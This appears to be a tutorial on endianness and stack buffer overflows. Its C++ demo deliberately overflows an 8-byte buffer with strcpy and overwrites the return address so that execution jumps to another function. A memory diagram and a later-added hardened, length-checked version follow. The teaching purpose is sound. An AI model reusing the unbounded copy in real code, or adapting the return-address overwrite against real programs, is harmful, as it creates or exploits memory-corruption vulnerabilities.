Big endian: the high-order byte of the data is stored at the low address and the low-order byte at the high address.
Little endian: the high-order byte of the data is stored at the high address and the low-order byte at the low address (e.g. x86).
Stack growth direction: from high address to low address
Buffer overflow: when a program writes more data into a buffer than the buffer can hold, the excess data overwrites the legitimate data next to it. Writing past the end of a stack buffer corrupts the program's stack, which can crash the program or redirect it to execute other instructions.
```cpp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <iostream>

int K;

void fun(const char *input)
{
    char buf[8];
    strcpy(buf, input);                 // unbounded copy: the overflow happens here
    printf("Address of Input=%p\n", input);
    printf("Address of Buf=%p\n", buf);
    K = (int)&input - (int)buf;         // distance from buf[0] to the input argument
    printf("%s\n", buf);
}

void haha()
{
    printf("\nok!success");
}

int main(int argc, char *argv[])
{
    printf("Address of Foo=%p\n", fun);
    printf("Address of Haha=%p\n", haha);
    void haha();
    int addr[4];
    char s[] = "FINDK";
    printf("Address of S=%p\n", s);
    fun(s);
    printf("%d\n", K);
    int Go = (int)&haha;
    printf("Address of &haha=%p\n", &haha);
    // separating the address of the haha() function into bytes, low byte first
    // (the 24/16 shift counts are reconstructed from the visible "<< 8" step)
    addr[0] = (Go << 24) >> 24;
    addr[1] = (Go << 16) >> 24;
    addr[2] = (Go << 8) >> 24;
    addr[3] = Go >> 24;
    char ss[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
    for (int j = 0; j < 4; j++) {
        ss[K - j - 1] = addr[3 - j];    // place the address bytes over the return-address slot
    }
    fun(ss);
    return 0;
}
```
buf in fun() has only 8 bytes of space. The string ss is longer than that, so when it is passed to fun() and copied into buf the copy overflows the stack frame and overwrites the return address. The part of ss constructed above lands exactly on the return-address slot and makes it point to the entry of haha(), so when fun() returns the program does not continue at the instruction after the call to fun() in main(), but instead enters haha() and executes its printf("\nok!success"), printing ok!success on the screen.
Memory model (32-bit build; the stack grows from high addresses toward low addresses):
00401019 ---- haha
00401005 ---- fun
..........................
0012ff68 ---- s = "FINDK"
..........................
0012ff30 ---- ss = "aaaaaaaaaaaaaaaaaaaaaaaa..."
..........................
0012fedc ---- input (&s on the first call, &ss on the second)
... (3 bytes) the rest of the return-address slot; these 4 bytes are overwritten with the new address value, so the return jumps to haha
0012fed8 ---- function return address  // when a function is called, the arguments are pushed first, then the return address
.... (4 bytes between buf and the return address: the saved frame pointer)
0012fed3 ---- buf[7]
...... (6 bytes)
0012fecc ---- buf[0]
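A defender-side companion to the program above, added here and not code from the original post: it puts a length-checked copy next to the unbounded strcpy in fun(), so an oversized input is rejected instead of overwriting the saved frame pointer and return address, and it shows the low-byte-first splitting that the addr[] loop depends on, done with masks instead of sign-extending shifts. The names bounded_fun, split_le32 and join_le32 are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* bounded_fun, split_le32 and join_le32 are hypothetical names added for
 * this page; they are not part of the original program. */
#define BUF_SIZE 8

/* Hardened counterpart of fun(): the copy is bounded by the destination,
 * so input longer than BUF_SIZE-1 characters is rejected instead of
 * spilling over the saved frame pointer and the return address.
 * Returns 0 when copied, -1 when the input does not fit. */
int bounded_fun(const char *input)
{
    char buf[BUF_SIZE];
    size_t n = strlen(input);
    if (n >= sizeof buf)        /* keep room for the terminating NUL */
        return -1;
    memcpy(buf, input, n + 1);
    printf("%s\n", buf);
    return 0;
}

/* Split a 32-bit value into bytes, low byte first. This is the order the
 * original loop stores addr[0..3] into ss[K-4..K-1]: on little-endian x86
 * the return-address slot holds the low byte at the lowest address.
 * Masking avoids the sign extension that (Go << 24) >> 24 relies on. */
void split_le32(uint32_t v, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = (unsigned char)((v >> (8 * i)) & 0xffu);
}

/* Inverse of split_le32: how the CPU reads the four bytes in the
 * return-address slot back into a code address. */
uint32_t join_le32(const unsigned char in[4])
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)in[i] << (8 * i);
    return v;
}

int main(void)
{
    unsigned char b[4];
    split_le32(0x00401019u, b);   /* haha's address in the page's memory model */
    printf("%02x %02x %02x %02x -> %08x\n", b[0], b[1], b[2], b[3], (unsigned)join_le32(b));
    printf("FINDK fits: %d\n", bounded_fun("FINDK"));
    printf("50 a's fit: %d\n", bounded_fun("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"));
    return 0;
}
```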
Buffer overflow exploitation (function jump)